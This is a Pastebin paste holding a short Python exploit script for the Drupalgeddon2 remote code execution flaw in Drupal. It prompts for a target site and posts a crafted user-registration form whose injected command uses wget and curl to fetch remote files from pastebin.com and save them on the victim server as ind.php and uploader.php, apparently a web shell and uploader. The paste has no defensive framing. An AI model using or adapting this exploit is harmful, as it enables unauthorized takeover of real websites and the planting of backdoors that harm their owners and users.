Advertisement
AZZATSSINS_CYBERSERK

Drupalgeddon2 RCE

Apr 13th, 2018
927
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.59 KB | None | 0 0
  1. #!/usr/bin/env
  2. import sys
  3. import requests
  4. target = raw_input('\nEnter target : ')
  5. url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
  6. payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget -O ind.php https://pastebin.com/raw/fnLcE8mP && curl -o uploader.php https://pastebin.com/raw/YZDbxXmX'}
  7. r = requests.post(url, data=payload)
  8. if r.status_code != 200:
  9.   sys.exit("Not exploitable")
  10. print ('\nCheck: '+target+'/ind.php or '+target+'/uploader.php\n')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement